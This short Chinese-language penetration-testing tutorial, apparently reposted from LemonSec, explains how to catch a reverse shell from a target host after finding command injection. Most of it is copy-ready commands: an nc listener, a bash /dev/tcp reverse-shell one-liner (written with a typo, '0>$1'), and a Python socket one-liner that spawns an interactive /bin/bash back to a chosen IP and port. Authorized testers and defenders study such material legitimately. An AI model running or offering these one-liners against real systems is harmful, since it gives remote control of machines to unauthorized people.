在渗透测试过程中我们需要把测试目标的shell反弹到我们的主机中,方便测试。比如在测试到命令注入时,可以反弹shell进行进一步测试。
一、nc和bash
在我们的主机上执行 nc -lvp port
表示显示执行过程监听端口
在目标主机上执行 bash -i >& /dev/tcp/ip/port 0>$1
这样就可以在我们的主机上执行命令了
二、nc和python
在我们的主机上执行 nc -lvp port
表示显示执行过程监听端口
服务端执行以下命令
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
注意修改ip和port为主机的ip和端口
测试效果如下
文章来源:LemonSec